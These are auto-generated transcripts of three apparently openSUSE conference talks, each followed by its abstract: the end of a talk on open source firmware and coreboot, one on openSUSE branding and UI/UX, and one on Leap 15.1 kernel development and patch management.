other hardware. But if you don't have RAM, then, you know, nothing actually works. Okay. So the laptop booted. I could also boot in my operating system. I could get the high resolution because the Linux kernel had the correct drivers and everything. And in fact, even without the video blob, I could actually boot. I just couldn't see the print where I would have to enter my password here to unlock. But yeah, I figured that out later then. Bluetooth works, Wi-Fi works, USB works, even suspend and resume, which I didn't expect in the first place worked. It didn't work with the lid being closed. So there is ACPI events which need to be triggered. But yeah, that's the next steps now. And one thing which is even more painful, I already mentioned this earlier, the embedded controller, which is responsible for cooling down the system. It didn't really do its job. I haven't yet figured out the issue, but we're getting there. Now here's another call for action. I know we have very, very, very smart people here who can help. We have Tuxedo here. I talked to them. There is other vendors, of course, but please talk to them. Talk to the device manufacturers or the retailers or OEMs, whatever, where you get your laptop from. Talk to them. Ask them about open source firmware. That's the first step to signal that we have a lot of interest in that. Operating system distributions. Why not integrate firmware updates as well? We just had a talk, a very short one, but a very good one, about transactions. When you hear, hey, we don't really want you to install firmware updates actually because it might break your device. That doesn't make us very happy. Coreboot supports having multiple payloads and multiple implementations of the initialization as well. So we can also failover. That's what the Chromebooks are, for example, doing, by the way. We can build our own firmware. We have OBS, we can even run checks on the firmware. We can use OpenQA for that. We have a lot of infrastructure. And of course, we can bring the kernel and firmware developers a bit closer together. So if you're working on the Linux kernel, look into projects like Uboot, look at Coreboot, see if there is something you can do for them, see if there is something they can do for you, so that you don't need to fix broken ACPI tables or something. You can join the community. We have different channels and different chat systems, IRC, there is Slack for the more modern people, and of course, now, let's celebrate, actually. Uboot and Coreboot are both turning 20 this year. This work has been going on for a long time. We have a lot of people who are using the Linux kernel. Let's celebrate, actually. Uboot and Coreboot are both turning 20 this year. This work has been going on for 20 years. It's not as old as the Linux kernel. And in fact, the Coreboot project itself was first called Linux BIOS, because that's what they were going for. Now it's more universal. We can celebrate 20 years of open source firmware, but there is still so much work to be done. So let me invite you to join us in the open source firmware conference. The next edition will be this year, again in September. This time, we will be in San Francisco. So we're going around the globe a bit. If you are interested, the call for papers is still open. If there is something you can tell, maybe from the perspective of an operating system, from a distribution, or from a kernel, please do so. We had lots of interesting talks already last year, and what I'm still missing is more synergies, because I feel that there is still something we can share. And with that, thanks again for everything, for listening to me here in the afternoon and hot summer. And if you have any questions, please ask me everything. The mic is already there. So you said that you were interested in building bootloader packages, so we already have a hardware colon boot project in OBS that could be used for that, or you could have, you know, a subproject as a new... Can you get the mic a bit closer? Sorry. There is a hardware colon boot project in OBS. If there's any additional bootloaders that you need beyond UBoot that we already have there, for instance, you're free to submit stuff there, or we can also create, you know, subprojects as needed for that. Okay, great. Thanks. My question relates to the management engine Intel. There are a couple of myths running around it, and what would happen if I just switch it off? We'll try. That's the point. How? So what you can do literally is, if you have the ME region in that flash chip I showed you, you can just override it with zeros. I promise you your system won't boot. That's what is going to happen. There is one project which is called ME Cleaner to strip down the ME to the essential part you actually need. I mean, if you don't have the ME running, then sadly your device won't really work. That's the sad news. The good news is that we can at least remove some stuff which is really not necessary, but potentially harmful. The project is also still going on. It's a Python script, so you can look into that. We're going to talk about it in Tuxedo twice. Can we assume from that that the current devices that they're selling with OpenSUSE are pre-installed have a proprietary firmware still? This one here is actually also a Tuxedo laptop, and it is running a proprietary firmware. In my case, it's from American Mega Trends, or AMI for short, and I even ran an upgrade to that. Currently, they do ship proprietary firmware. They do offer updates. You have to sign up on their platform and ask for them, and you can at least get updates. But of course, I would also love to see OpenSUSE firmware on it. I actually do talk to them a lot. We have one guy who already ported his laptop to Carboot, which is also a Tuxedo one, a quite modern one. I'm looking forward to parting this year next. Once my other laptop is working properly again, we can swap roads and take care of this one. We have two minutes. I still have a little bonus. I already talked to you being maybe kernel developers or maybe distro developers. There is an event coming up, the ITSA, or ITSA. ITSA is also here in Nuremberg, so that's later in the year. You can use this opportunity to come and visit a friend of mine who is running the company Nine Elements Cyber Security. They port Carboot onto more and more devices, and they develop security features for the firmware. If you are running data centers, this might be an option for you as a business user. Any more questions now? Thank you.
Firmware is found in all computing devices, including PCs, laptops, networking equipment, printers, embedded devices such as IoT and industrial controllers, mobile phones, tablets, and more. The community around open source firmware has grown over the last years, allowing for more exchange in the development and granting freedom to end users. Prominent projects like U-Boot, Tianocore, coreboot and others teach how firmware works and welcome contributions. This talk provides a brief introduction into firmware, an overview of the general build process, a perception of the current state of development on two platforms, an end user report, and a summary of the first Open Source Firmware Conference, which was supported by the openSUSE project.
10.5446/54415 (DOI)
Hello, I'm LCP or Tashik as you can see. I will be talking about artwork and branding and UI and UX of OpenSUSE over the last two years basically. I think I should start from inviting you to join the team because we are missing a lot of people. It would be great if the team was larger and I would be glad to see some people joining the team because we are doing great things. And to the extent of us doing great things, it's important to remember that we don't really take feedback through Twitter, but it still helps us to get some feedback through Twitter is nice, but there are better channels to request some features. And I mean, we also do memes when we have some free time. So I mean, I welcome you to join us. From the stuff that we have done, this is very short list, but I mean, we did yes icons which you might have seen in LIP, in Tumbleweed. We have done branding for the distributions over the last two years. And there is so much more that we have done, but I feel like contributions that really matter are the ones that are not really visible to everybody because you get to appreciate them despite the fact that you don't really know who made them. It was the team that was us. And well, from my maybe a little bit more personal point of view, we have some things to discuss. And those things are logos, are colors, are things that people associate with open source and things that maybe aren't exactly the thing that they should be. Maybe we should try to make them a little bit more accessible, a little bit more interesting, a little bit different from, for example, SUSE logo, which is exactly the same as open SUSE logo, with exception of cutoff feet. So currently, we share the same logo. And it's probably not the best idea that we do because, well, our branding is very much similar to what SUSE folks are doing. And it doesn't help us to have our own identity. It doesn't help us to have our own marketing, maybe. It's very much, this also leads us from being separate. And we should maybe, from the point of view of actually being different entities, and well, we name ourselves different entities despite the fact that we are basically the same but we are trying to be separate from SUSE. And obviously, there is the point of Wikipedia having wrong logo, which has filled out I with white, which looks terrible on any other background white. And I can change that because I don't have access and nobody has access because the guy that changed it stops contributing to Wikipedia and then just I can change it. Nobody can change it, it seems. So maybe we can change logo for that reason. All right. There is also topic of distribution logos. And here probably, Tumbleweed is the biggest issue because it's so wide that next to Leap it's really hard to make it work. As in, it doesn't look like the logos belong together, which is an issue when you are trying to present them next to each other. They appear to be in different styles and, well, that might be something that needs to be iterated upon, maybe changed in the future, something that needs to change. And there are colors and colors are, you know, you know our colors. They are visible on the slide. There is dark blue, green and a hint of the cyan on the bottom. Distribution logos use green, at least one distribution logo uses green for its color, which makes it look next to open to the logo as default distribution, which is an issue when you are trying to present Tumbleweed and Leap as things that are equal to one another. Maybe that also requires some thoughts from us and there is a very limited palette. So there is basically, I added red and yellow last year, I think, and it's still barely enough to actually create artwork that would be in line with what we want out of OpenSousa as in brand and from what we actually can do because there is a limit to the colors and stuff. This far there were few ideas that appeared in different places. They are very simplistic and would probably help to show the way, would allow to easier show the brand compared to current ways. It's an interesting idea. I don't know if anybody likes it. So that will maybe require some discussion. Obviously, you can also see that Leap here is yellow instead of green, which I think is a great color. Yellow is great. And certainly it's in green, which makes it look less default than it currently appears to be. And that logo was a happy accident. That second one was a happy accident of going through various stages of previous logo and then creating stuff that just kind of worked. There are obviously on the left there is depressed and very happy Giko. And there is also a Giko. There are a lot of weird ideas that came from that. And there were some ideas for variants because current logo has very strict guidelines as to what colors can be used with it. And I feel like maybe we could create some more interesting stuff. Out of this, there is obviously Fedora logo Giko and Thread Hat logo Giko just because I could. There are different variants there. I don't know if there are grades. There are things. And I think it's a better idea than having Giko always be green because communities want to express themselves in a way which would show better who they are. So there are, for example, community logos, proposals for different countries on the bottom there for Poland, Ukraine, and Italy for some reason. I don't know. So feedback about that. There is an open issue on branding repo. And I would really love more feedback about all those things because I mean, it will, if that goes through, it will represent the whole community. And I would love to hear what you think. I can't do this alone. I just can't. So there are more issues related to presenting the brand from desktop side of things because we have wallpapers. We have some splash screens for different software. And it appears before the presentation as XFC was loading. There are those simple things that maybe are ignored but are very important from my point of view, from where I'm standing. And maybe currently we are thinking to modern. We are a little bit too far in advance to what OPS truly is. We have green and we have very specifically chameleon as the logo. Maybe we could do something more natural, maybe something more, I don't know, something that isn't as modern as what we currently do with architecture and with light bulbs and stuff like that. Maybe there is a place where more natural things would work better with the things we currently have, which is green, blue and stuff like that. There is also an issue of merchandise. And it's a topic, certainly. We tend to focus heavily on logos, which is fine when you are trying to maybe spread awareness of the logo. But I think that maybe we should try to be a little more creative, try to be a little more interesting with how we present the brand outside of conferences, outside of websites, et cetera. We want people to go up to other people and ask, wow, what a nice t-shirt, where did you get it? And you can explain all the things you use to open Susan, et cetera, if you have some desire, if you don't, then you go and don't tell them anything and just say that it's a great t-shirt and I like it. There is, all right, maybe you export part of things. There is obviously, that's a list. It's not a complete list, but it's certainly about the asked. And well, I mean, if you ask asked guys about this, it's very clear that they would like to change that, but it's not like they would like to change that. So maybe start off here, but maybe not start from here, maybe start from actually creating mock-ups of things that should happen in asked and then when we are ready to have some, when we have some idea of what we exactly need, we should start writing all that stuff in LibWire UI and LibWire UI, I can't, and then write all that stuff in Niest Core, et cetera, and all this stuff needs to go through stages to actually be developed into something that can happen, can be a thing in the future. So if you are interested, currently we don't have any place to really put that stuff, but I was thinking about Trello board and creating some issues about specific parts of asked and then we have some mock-ups for installer, but we certainly don't have mock-ups for the rest 70 other modules that exist in Niest and I doubt we will be finished with that till the, I don't know, next year, because it's a lot of stuff to do actually. So from this point of view, if you are interested, let us know. We are on Discord, Matrix, IRC, OpenSUSE, artwork everywhere, just let us know. And then there is landing page. And oh boy, what a joy. I mean, I like the design, it's great, but I don't think that content is necessarily what we should have there, because we are looking at very distribution-focused design, which OpenSUSE more than being a distribution is a community of people. So if we are a community, it would be nice to actually mention that we are a community somewhere on the page. So maybe instead of having all this, maybe we should use software, OpenSUSE.org to actually show that we have distributions. And maybe on the main page, just mention that, hey, you can go download them here, redirect to this page. Maybe it's a better idea. There is a lot of duplication of the things that we are trying to sell between two sites and navigation structure is terrible on the main page, because it redirects to only the stuff that is on the page itself. And I don't think that I can scroll. I don't really need to have those things show up. I would like to see things that actually redirect me to something that isn't on the page, that is related to how OpenSUSE operates and how it works, but not necessarily what is directly within the page. Then we have list of tools, which is, well, it's not a long list, that's for sure. I'm certain that we are actually doing more stuff than four things. And maybe Wiki isn't the best place to put them all. There is certainly not enough space on the screen, too. But I think that having few categories about the things that we do is great. But maybe mention everything that we actually do, because that stuff is useful and we are proud of it as a community. Maybe we could have those mentioned on the main page. Then, oh, yeah, I mentioned all that. And news are great. I would say that news certainly deserve to be on the main page. I am glad they are already there. So from this, we do have stuff that we know will be on the page. But what is missing is certainly focus on the community, focus on the ways to contribute, focus on developed projects. All of that is really, really missing from the main page. And then there is software, which, well, it's missing a lot of stuff about distributions as well, even though it is focused about distributions, around distributions. All that stuff is basically on the Wikis and it's hard to find, and it's kind of maybe not that well executed in many cases. Maybe we should try to strive for better explanation of our own distributions. Maybe we should sell them better. Maybe we have something that differentiates us from different distributions. I don't know. It's not written there. So yeah, that's basically it. I don't have anything else prepared. I have a nice screen and that's it. Thank you. So now is the part where you ask me questions. I don't know if I will have answers, but I will try to answer you. If you have any questions. So if you want to change the logo to have more of a clear separate identity from SUSE, what about the name? So historically speaking, the logo itself is based on an old SUSE logo. They changed the SUSE logo and they didn't update the open SUSE logo, which created disparity between the two and it only makes things worse, in my opinion. It's not really, I mean, the change of the logo was basically only cutting off legs and that's it. Yeah, mainly. You're right. Mainly, but not exactly. That's not exactly the truth, but it's close. It's close enough from a normal user's perspective. That's what they say. But the fact of the matter is, is that when that happened, that just weakened both brands, in my opinion. Yes, of course. The idea of creating a different logo, in fact, I really like that work that you did. I saw that. It's been around for a while and it's been really good. I agree with this young man saying that if you want separation, then go separation. So as long as we try to keep them close, similar, but different, there's going to be a lot of constraints on that and it's going to be really hard to push through. And then Susie has a vested interest in it as well then. If you change it, that goes away. I hope so. I mean, I'm bound to the last part of the, if paradise is, I'm bound to that. I'm not talking about that because I know that's way more controversial than the logo itself. So I will ignore it. How long did it become a version? So let's go back to Yast. Because you mentioned the partitioner, for instance. And that's one thing. So here's the interesting part of Yast is that it's the one place where Susie and Open Susie are directly connected because Susie certainly has a very long list of features of required functionality, la, la, la, la, from product management that is really historically grown and probably not that transparent. So not everybody knows exactly why every feature is in Yast that's there. The partitioner is something that we haven't touched because of the complexity and because of that, those kind of issues so far. I was told that the reason why partition looks like it does is because nobody cares to change it. It's too complex to change. It was based on some stuff many, many, many years ago. And building on top of this old thing is just making it worse. The fact of the matter is that you have Yast and the partitioner is a separate thing. So the partitioner itself in code is a separate thing. And it uses a different QT. It's all... No, no, no, no. That's Packager which does that. Partitioner itself is a module that is directly bound to Core Yast. And Packager is a separate module that is built on top of QT. The package selection stuff too. So I mean, partitioner shouldn't be as hard to change. Package management I won't talk about because I know it's for Yast for controversial topics. It's a big country. I already discussed it. Realistically speaking though, the package manager would be an easier thing to change from understanding users' needs than the partitioner would be. Yes, yes, of course. I mean, the first thing that partitioner certainly needs is a menu bar because it's a lot of Yast modules need that. It's a feature that needs to be somewhere in the code. It is in the code, but only for QT and only for wizard dialogs which is installer and one QT install which wouldn't make sense for partitioner. So I'm not trying, I'm sorry. The last point on the Yast thing was, go back to the screen. I forgot now what I was going to say. Ah, the idea of creating mockups. So Yast in and of itself, the way it works, being built on an old QT with, you can't just do whatever you want. Yes, I know. That's why I said that all the stuff would need to first go through LIBWI UI and then go to the Yast bindings and then go to other things. It's a complicated process, but creating stuff that is reusable and that will be able to reuse in multiple places will make it much better. Which is why mockups make sense because we can then just look what we can simplify in multiple modules and have it all make sense, maybe. Again, assuming that you have a full and clear picture of all of this, any of this, is a full and clear picture of requirements. Yes, and that will be hard. So I just want to ask, would you say this is a big dream of yours? It's good that you've done a lot of explorations with the logo. Is it more like something you're doing on the side or is it something you really want to action and push within the company? I mean, it was in discussions with the board, certainly. It's not like I'm hiding that. It publicly shows up in multiple places. And I doubt anybody haven't seen that. Obviously, somebody here won't have seen that, but I hope that this spreads and gets maybe popular so I can get it easier into the distribution. What would you say your number one blocker is? What is stopping you from getting to the next level? That's a good question. I have no idea, to be honest, because I think the biggest blogger is myself. Because I keep changing stuff and I keep adding stuff. And at some point when I stop doing that, I will have clear picture that I want this and that. And I doubt it will happen soon. Okay. Do you have a chief of marketing officer? Huh? Do you have a chief of marketing officer that you could collaborate with? I mean, not so much on the visuals, but more on the idea. I mean, I don't really have a direct contact with anybody like that, but that would be an interesting collaboration. Sure. Okay. But I doubt from your presentation it sounds like you're the guy to drive this. I hope so. Yeah. I mean, I haven't seen anybody else that would be crazy enough to change that. Yeah. Thank you. So about the landing page, I asked with Kristian and Broen, they said that the landing page is now not controlled by open-susa communities, controlled by Suzer. So we cannot kind of change it. That's actually from... First off, I'm the head of the UI UX team at Suzer, just for transparency. It is not controlled by us. I promise you we don't want to control it. The fact of the matter is, is that whenever things are needed, we end up having to do it because no one else will. And logistically speaking, it's sitting in a data center in a server room where Suzer and open-susa don't really have that much access. So it's... And control is hard. To understand... So it might be interesting to understand the history of that page. Historically it became what it became back a long time ago. We came along and there was a request to change things. We took with, let's say, limited information, which is always the case at Suzer or open-susa, with limited information, we tried to create a more marketing-like-ish page to sell open-susa in the internets. That was the concept of that. When requirements change, if there are many ideas of what could be on that page, there are many ideas of how to present it. Many are assumptions, software is software and the marketing page is the marketing page. So software is where you go find your packages. The marketing page is the marketing page. You can change that. You can do it differently. There's no law that says that. We don't define it as such. But again, understanding requirements is the first step. And understanding that, really ask the whole community, get a good idea. Have someone with a marketing concept create all this information first before you start changing things. That's my suggestion. And don't ever write code that you don't want to maintain yourself. That's what I've learned. I create mock-ups first. And one more thing is about the funds. Now we have open signs on almost every page. I think it's a good fund, but people are just getting bored by this fund. Every web page uses the same fund. If we want to be kind of, let users remember us. Maybe we will introduce more funds. If anybody wants to create a fund, I'm not the guy. Certainly, I can't. I mean, not create funds. Maybe choose a more special fund. I'm not bored yet, maybe. But if anybody has better ideas, I'm very happy to oblige. Once you have a good idea of what you want your logo to look like, it is then much easier to come up with a special font that sits alongside and matches that logo well that can be used in special places. And then after you, Andrew. So after, yeah, sorry. The one thing that you have to take into consideration with fonts is glyph coverage, language coverage. It's really, really, really, I'm not looking at really hard to make a font. It's literally something that you can do your whole life and then just get good at. And you can spend many, many years with many, many people making fonts. So creating your own font is probably maybe a bit beyond scope, I would assume. People have tried and failed. Picking the best font for the most people is, I think, what the decisions were based on until now. I mean, that's the reason why we don't use FIFT like anymore. Because coverage was very poor and even in Polish, there wasn't really a way to display anything outside of very limited set of stuff. So I'm in agreement that the logo needs to change and I actually like your mock-ups. I like them a lot. The question I have is, an open SUSE have a strong symbiotic relationship. And we need to ensure that that relationship continues and we also need to advertise in one shape or another that relationship. I mean, example of Red Hat and Fedora comes to mind. It's not like that's disassociated entirely. But I think that, and it's completely different colors, completely different stuff, except for obviously Hat and Fedora. So I like the fact that it's still a chameleon for me. As long as it's a chameleon, there's an obvious association. And chameleons are wonderful creatures that can be many weird different colors. So I think as long as it's recognizable of some form of the same kind of animal, we have that cross-representation still. And for me, that's kind of enough. Let's make it pink then. Red used to be my favorite color. So very honestly, this idea of open SUSE being close, branding-wise, but yet separate was a big mistake, if you ask me. So historically speaking, that was a mistake, tacking and open on to everything because we're trying to sell our open sourceness was historically a bad decision and should be changed, but you need, again, a strategy and understanding. I didn't say that. I said that. I said that. Yeah. Just to kind of follow what I was thinking, I know you skipped over the name thing, but with the logo idea, with also something the board is going to be talking about at one o'clock in the main hall for the big board meeting today, I do think maybe that needs to come up with it. What I like with your ideas is if we keep it to the chameleon, like with Fodor, there's room for visual similarities, but colors, naming. I'd like us to have everything on the table as we talk about this stuff. All right. That's your call. Yeah. I am not saying anything because I did suggest some, whoops, whoops, I did suggest some names, but they weren't great, to be honest. Yeah. I know this will end up being a massive discussion in the last February, but at least it's my fault now. Thank you. Yeah. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
openSUSE's brand image and software have been evolving for a long time, and in that time a lot of stuff was defined. There is YaST, there is geeko, both are industry standard, both function as a way to differentiate the distribution. However not everything that is openSUSE is great, in many cases, there are some serious omissions in terms of how openSUSE is sold through the eyes of potential users. This talk would function as a way to highlight some of the issues that will require further development in upcoming years, to support future devices, use cases for the distribution, ease of use, as well what we should improve in terms of presentation of the brand itself.
10.5446/54416 (DOI)
I'm Takashi. I've been working for a long time and still I'm working for the kernel stuff. And this year, again, my talk is about the kernel. So this is the outline of my talk today. So at first, I will start something clarifying meters and followed by what's new in the LEAP 15.1 kernel and then going to the open-susage kernel development process. And that's something to show how the things get fixed and how the things get tested. So the first topic is about clarifying meters. That means just kind of FAQ about our kernel. And here's my talk about Open-Susage LEAP and Susage Linux Enterprise. And one of the common questions is, well, LEAP and SLEC kernels, they're same identical? Well, it's yes and no. Yes, the both packets are built from the very same source tree. However, SLEC kernel and LEAP kernel, they have major differences in the binary form. And first of all, the kernel configurations, they're completely different between two. Susage Linux Enterprise kernel have reduced kernel configuration while Open-Susage LEAP contains almost four enablement of all features. And SLEC kernel has a split for two packages. One is supported and the other is unsupported modules. And while LEAP has only one package, it contains everything. And both packages are built in different environments, built services. IBS, internal build service, versus OBS, Open-Susage build service. And then SLEC kernel supports live patching by K-graphed while Open-Susage LEAP doesn't provide that yet. So they're also the same, they are built from the very same source tree. The resultant binary packages are completely different. And maybe that is the most commonly asked or seen thing. The Open-Susage LEAP 051, 14, fold of 12 kernel that is very, very, very old. Yeah, yes, it's old. And actually, looking at our history, Open-Susage LEAP takes relatively old kernel bases. So Open-Susage LEAP 42 took 4.4 kernel bases and Open-Susage LEAP 150 and 1 are based on fold of 12 kernel. That's correct. However, we took really huge amount of patches on top of that. And now, well, Open-Susage LEAP 150, we already took 22,000 patches on top. Now, guess what, for 51, 46,000. So almost 50,000 patches on top. And that's why it is no longer for the 12 kernel. It is a kind of question of them, shape of TESELs, that's a famous soft experiment. So this is no longer original for the 12, but quite, yeah, containing so much different components on top. And is it deep? Is the kernel stable? In that case, the answer is yes. So actually, this is a reason, the very much reason why we take that old kernel code base. And that's another point about stability is that we guarantee, as a kind of guarantee, to provide a consistent kernel ABI. That means if you build a kernel module package once, then this package can be built for all kernels after upgrades, updates of the same version. And we do proactive back porting fixes, and also that's from several trusted sources. And we do CI and QA testing regularly on the kernel. So let's continue to the next thing, that's what's new in D51. So as I said, there are so many changes in the kernel in D51. And this is a table showing the how, so which directory, top directories in the kernel contain the changes. And as you can see, that's majority of changes have been done to the drivers. This astonishing over 86% of the source code changes. So in the end, we almost had 5 million lines of changes, and about that 86%. And this is not surprising, because in general, the vice drivers that tend to have a bunch of changes in the code, while the important changes like the memory management core or file system, their changes amount of changes are showed, so small, however they are important. And for deep and S3 kernels, we are kind of conservative. So we don't touch too much about the core part intensively, while we are back porting many things to support the new features of the new machines or new systems. That's one of the reasons that we get this statistics. So now 51. So let's start from the server side. We had, as you can guess, many, many storage and file system, block layer and network updates. Most of the recent scudgy drivers have been updated. And in the bunch, and one other interesting thing is the NBME over fabrics that is required for net app stuff. And we catch up upstream. And the file system got also a bunch of updates, especially BataFS. This is our default file system. And also XFS, XF4. And at this time, we got a bunch of B cache updates. And MD rate and CF and CIFS. And block layer, now we are still, I think we still didn't switch default to multi queue, but we got the updates to the most recent college for the block memory queue. And that includes the BFQ IOS schedule. And network, yeah, of course, the network core has been updated and Ethernet, yeah, Broadcom, Cobbium, ChaveCVC, oh, well, you name it, most of the vendors have been updated. The desktop usage, the first of all, that is video driver, DRM stack updates, that we raise the whole code up to 4.19 or later stage. And actually, this is very much many, many changes. And this is about 20% of the whole 50,000 lines of changes. And also Wi-Fi drivers, we update almost the whole Wi-Fi drivers and Wi-Fi stack up to 4.19 plus, storage, MMC, SD, and there have been updated. And sound drivers, that's my area. So I update, upgraded whole HD audio, USB audio to 50 or even 5.1. And then bus platforms, et cetera, we got a Thunderbolt update, PCI Hot Black, and FGPA, small pitch still. And TPM122, to their things, and RDD memory band, band with allocation stuff, also hardware, Friptow, and X86, HWMI, this is for laptops and desktops. And virtual machines, KVM, HyperVs, and they have been updated. And security, up-armor. And another interesting thing is AMD SEV, that is a secure encrypted machine. I forgot the anonymity. And tools as a perf and BPF, of course, these stuff have been updated. And architectures, and for the X86, we add support for the recent Intel and AMD chipsets. Like, I forgot the name, Whiskey Lake, Ambar Lake, or, and AMD Ryzen Zen 2. Zen 2 is just a little bit. And ARM64, well, there are so many changes, and I cannot list up. So if you have a question, here is a Matthias Brueger, then he can answer. Yeah. Or something's broken that it's because he's updates. And ARM's 32-bit, for that, we didn't have much updates, but back ports, but only casual fixes that are supported from the trusted stable tree or fixes. And ARM's 32-bit is provided only for deep. This is not for Susie Linux Enterprise. And on the other hand, ProPyC64 and S319, they are mostly for Susie Linux Enterprise, and they got also updates. Also, we provide, I think, we provide these architectures packages also for ports on OpenSusie. So continue on Susie Linux kernel development. How that happens. So, not surprisingly, we manage that in Git. Yes, of course, everything is on Git. And what is different in Susie, OpenSusie, kernel source management from other distribution is that we keep all code changes in individual patches instead of applying the patch on the Git kernel of tree. Instead, Git kernel repository contains patches, patch, patch, patch, patch files. And this is applied on dynamically, it's a building package, so just like a kuch. And this series.conf contains a list of patches, so which patch is applied first and then so on. And it repository contains a patch file. When you look at the kernel source packages, you can find that over 97% of patches are from upstream. So, I mean, this means upstream industry. And that is the result. We really try hard to push upstream first rule. So we basically accept only patches that are upstream or that will be upstreamed. And the recent changes in the development process is that when we apply sorted patches. And what is sorted patches? That means basically we apply the patches in order, the same order like upstream tree. So suppose that upstream industry had changes A, B, C. And then we applied patches A, B, and C, that order. That's all. That is sorted patches. That means we, for example, when we hatch the patch B and C first applied and we found out that the patch A is missing, then we have to apply patch A. And in that case, we don't apply patch B, C, A, instead we apply patch A, B, and C. So for that, always reordering the patches to adopt the upstream, the topological order. So that is the key of the sorted patches. And why we do that? Because by keeping the sorted order, each patch becomes closer to the original form. And this has a big merit that makes the backport easier, backport cleaner. And also it makes it easier to catch any backport mistakes. You can just compare the patch, the backported patches, patch and original commits. So how to expand patches? Yeah, we have 50,000 patches, as I said, and this may take really long time. If you run Kilt script for these 50,000 patches, I measure that and that takes six hours on this machine. Six hours patch up time, it's not good for the daily job. I morning up on the patches, then sleeping, the day is over. It's a good job. So that can be actually faster. So we had already a script, so-called a sequence patch, and that applies the patches, just like Kilt, but optimized way. And this takes nine minutes, 25 minutes for 50,000 patches. It's faster, yeah, but still takes time. But there is a trick. The script got fast mode. And what does mode do? The problem of the previous approach was that script invokes patch program at each time. That means 50,000 times patch was invoked, so patch program executed. That took so many time. So instead, this mode, we gather all 50,000 patches in a single patch file and feeds to patch program. Then that works. Then that's 80 seconds. Good. However, the drawback of that approach is that you cannot roll back to the patch that's failed to apply. Is there any better way? Yeah. There is. Recently, Michal developed a program called rapid Kilt. And this is a program written by Rust, and that applies the patches in parallel, and also supports a rollback as a patch failure. And if you use that program on my machine, that's with 8-core machine, it takes only three seconds for applying 5,000 patches instead of six hours. That's really awesome. Then suze kernel G3. This is publicly available, and you can see that kernel.suze.com at any time. And this G3 contains several different branches, and each branch represents, so to say, the product. Like SLF 15, what is it? It opens to 15.0, opens to 51, and also Tumbleweed is taken from the stable branch that's tracked to the upstream stable kernel. Also, there is Master and the Hedge, this tracking the industry that's currently 5.2 RC1. And also, there is a vanilla and Linux next branches that automatically fetch G3 from the upstream. These are all just for testing. And Git workflow. That's we do, yeah, kind of GitHub like, or a normal Git workflow, just taking the each branch maintenance takes a pull request from the each developer and merge after integration tests and review. That's the way. There is a K-Built bot running that's testing the builds and also doing sanity checks like patch can be applied cleanly or something wrong contained and so on. And if everything is okay, then K-Built bot says that yes, this branch can be merged, and the branch can be reviewed and merged. One thing to be noted that is that some branches are shared by other branches. For example, SLA 15 is shared by many other branches, and this branch is automatically merged to other branches. This is like that. So SLA branch is merged to SLA 12 SP4 and SLA 15 SP1 and SLA 12 SP5 and SLA 15 is derived to open SLA 15.0 and so on. That's for users and developers. One good thing to know is kernel of the day. This is really I would recommend to remember. And actually this is a kernel package built from the very latest kind of git branch. And in OBS, it's updated daily. So every day it's updated and fetch the very latest git repository and rebuild the package. That OBS kernel colon SLA 15 was this kernel colon branch that contains the kernel package, kernel of the day. So why this is good? So you can install kernel of the day package from other branches too. That means if you have a brand new laptop that opens with the D51, still doesn't support, then you can install open through the tumbleweed kernel and very latest one from the kernel stable tree. Or if you have a regression after upgrading to the open through the D51, then you can just install the old open through the D51 kernel on top of your 51 system and see whether the problem gets fixed by that. And if yes, then this is a kernel regression of 51, you can report that. Then we see what changes are done and so on. Once it to be noted that you should better to increase the number of multi-installable limits in zip.conf file beforehand. And as a default, I think there are only you can install two or three kernels on the system. But usually I increase that number to five or six. So backfixes. So as I said, the deep world in general open through zip, we update backfixes on by our hands. And usually we take the backfixes from upstream commit and how we can find that backfix. Nowadays the kernel developer is supposed to mark fix its tag if the commit is supposed to be a regression fix. Then there is a script program called Gitfixes. And this program can scan the upstream changes and reports which commit may fix the bug that's found in our kernel. And this is one way to find out the fixes from the upstream. Another way is just looking at the stable kernel trees. Currently there are 4.14 and 4.19 long time support kernel. And there is script. Gitfixes can take a look at that and see which path which commits are missing. Possibly fix the problem. And if we have a problem, then of course you can report open through the backfix. Or we can take a look at upstream backtrackers too. And now this is something new. Now we have a lightweight CI test for the kernel. And actually this is running hourly on my desktop. It's fetch the Git commit and if something changed, then running the test. And it tests on the KVM and boots to the desktop system and doing also suspend regime testing. And there are different images built from the different file systems and also legacy boots and different QM graphics backends. And so that helps sometimes to catch their regression as early as possible. And another new thing is that we deploy open QA tests for the kernel of the day. So thanks to the QA team, they take certain branches, currently SF15, SF12, SF4 and something else. And they test kernel of the day, so every day, basically. And that's open QA, so it's currently limited only on virtual machine. And the test scenarios are also limited currently test only LTP. So that's basically all my topics. Then resource.com and OBS, the repository is there. So if you want to find something, you can take a look at this. Okay. So that's all. Any questions or bashing to the kernel package or something else? Yeah. Hi. It's not directly a question, but more like a comment. So I think as a open source community, we should think about how to manage, how to handle requests for open source and deep kernel development. Because I think we use an open source, we use this kernel, which I think makes a lot of sense because of the stability. But we sometimes had the problem that afterwards someone came and said, hey, this driver or this peripheral is not working. This is a bug. And we told him, no, you can't, we can't add this driver now because it's already closed. So we, I think we would need to like formalize in some way the possibility for the community to create feature requests against lib kernel to include their needs. Yeah. Thank you. Yeah. Very much. I agree that we used to have open page in the past, but it was discontinued, I think. So the current way to request for the open source deep is either a bug, just open the bug, enter to report that, or ask on the open source kernel mailing list or factory. Maybe the open source kernel is better. But yes, it would be better to have some more formal way, yeah, because we want to track the feature request itself. Yeah. But I think this, yeah, maybe it's above my hands. Good. Okay. Thank you. Thank you for that.
The saga continues: after the legendary Leap 42.3 trilogy, we entered a new era of Leap 15.x. This talk will look over the past Leap 15.0 kernel and the ongoing Leap 15.1 kernel development, which new feature are armed, how they are managed and how they are processed.
10.5446/54417 (DOI)
